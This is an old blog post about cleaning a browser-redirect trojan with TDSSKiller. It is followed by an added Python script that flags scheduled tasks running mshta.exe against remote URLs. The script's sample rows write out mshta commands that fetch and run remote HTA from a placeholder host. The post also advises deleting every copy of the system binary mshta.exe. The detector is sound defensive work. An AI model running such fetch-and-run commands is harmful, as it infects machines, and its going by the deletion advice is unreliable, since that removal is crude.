Tuesday, January 25, 2011

Browser Redirect Virus

So I had this virus that was redirecting my browsers; AVG, Spybot and MalwareBytes did not detect anything. After running HijackThis, I noticed some scheduled tasks. When I checked my Task Scheduler I noticed 23 scheduled tasks that ran mshta.exe and some URL. I deleted all of these scheduled tasks, searched my C drive for mshta.exe and deleted all instances of it (may need to use Unlocker to do this).

Once I rebooted I ran AVG, Spybot and MalwareBytes again; AVG found 4 things and could not remove them:

"C:\WINDOWS\system32\svchost.exe (1652):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\system32\svchost.exe (1652)";"Trojan horse Agent_r.XJ";""
"C:\WINDOWS\explorer.exe (636):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\explorer.exe (636)";"Trojan horse Agent_r.XJ";""

After some googling I found someone recommending TDSSKiller from Kaspersky. So I ran this program and it found 2 threats and removed them with a reboot, which healed my system completely; an AVG scan confirmed this.


Download Link: http://support.kaspersky.com/downloads/utils/tdsskiller.zip
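
Added example, not part of the original post: a Python triage script that parses exported `schtasks /query /fo csv /v` output and lists scheduled tasks whose action runs mshta against a URL, the pattern described above. The sample rows, task names and URLs are constructed, and the function name is hypothetical.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /fo csv /v` output, trimmed to three
# columns. Task names and URLs are made up (example.invalid never resolves).
SAMPLE = r'''"HostName","TaskName","Task To Run"
"PC1","\GoogleUpdateTaskMachineCore","C:\Program Files\Google\Update\GoogleUpdate.exe /c"
"PC1","\At1","C:\WINDOWS\system32\mshta.exe http://example.invalid/a.hta"
"PC1","\At2","mshta https://example.invalid/b"
"HostName","TaskName","Task To Run"
"PC1","\Defrag","C:\WINDOWS\system32\defrag.exe C:"
"PC1","\HelpViewer","mshta.exe C:\Tools\help.hta"
'''

# mshta as the program name: bare, with .exe, or at the end of a path.
MSHTA = re.compile(r'(?:^|[\\/"\s])mshta(?:\.exe)?(?=["\s]|$)', re.I)
# A remote http(s) URL anywhere in the task's command line.
URL = re.compile(r'https?://[^\s"]+', re.I)


def suspicious_tasks(csv_text):
    """Return (task name, URL) for each task that runs mshta on a remote URL."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row.get("TaskName") or ""
        action = row.get("Task To Run") or ""
        if name == "TaskName":
            # schtasks can repeat the header row inside the output; skip it.
            continue
        url = URL.search(action)
        # mshta opening a local .hta file is not flagged; only remote URLs are.
        if MSHTA.search(action) and url:
            hits.append((name, url.group(0)))
    return hits


if __name__ == "__main__":
    for task, target in suspicious_tasks(SAMPLE):
        print(f"{task}\t{target}")
```
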
